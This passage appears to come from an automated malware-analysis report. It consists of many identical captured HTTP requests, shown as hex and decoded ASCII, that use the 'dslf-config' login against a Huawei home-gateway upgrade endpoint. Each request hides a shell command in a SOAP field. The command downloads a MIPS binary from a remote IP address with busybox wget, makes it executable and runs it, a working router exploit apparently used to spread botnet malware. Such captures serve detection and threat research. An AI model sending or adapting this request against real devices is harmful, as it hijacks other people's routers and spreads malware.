20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox rm /tmp/.oxy; /bin/busybox wget -g 94.154.33.42 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 474Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 72 6d 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 34 2e 33 33 2e 34 32 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox rm /tmp/.oxy; /bin/busybox wget -g 94.154.33.42 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 474Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 72 6d 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 34 2e 33 33 2e 34 32 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox rm /tmp/.oxy; /bin/busybox wget -g 94.154.33.42 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 474Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 72 6d 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 34 2e 33 33 2e 34 32 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox rm /tmp/.oxy; /bin/busybox wget -g 94.154.33.42 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 474Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 72 6d 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 34 2e 33 33 2e 34 32 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox rm /tmp/.oxy; /bin/busybox wget -g 94.154.33.42 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 474Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 72 6d 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 34 2e 33 33 2e 34 32 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox rm /tmp/.oxy; /bin/busybox wget -g 94.154.33.42 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 474Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 72 6d 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 34 2e 33 33 2e 34 32 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox rm /tmp/.oxy; /bin/busybox wget -g 94.154.33.42 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 474Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 72 6d 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 34 2e 33 33 2e 34 32 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox rm /tmp/.oxy; /bin/busybox wget -g 94.154.33.42 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 474Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 72 6d 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 34 2e 33 33 2e 34 32 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox rm /tmp/.oxy; /bin/busybox wget -g 94.154.33.42 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 474Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 72 6d 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 34 2e 33 33 2e 34 32 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" 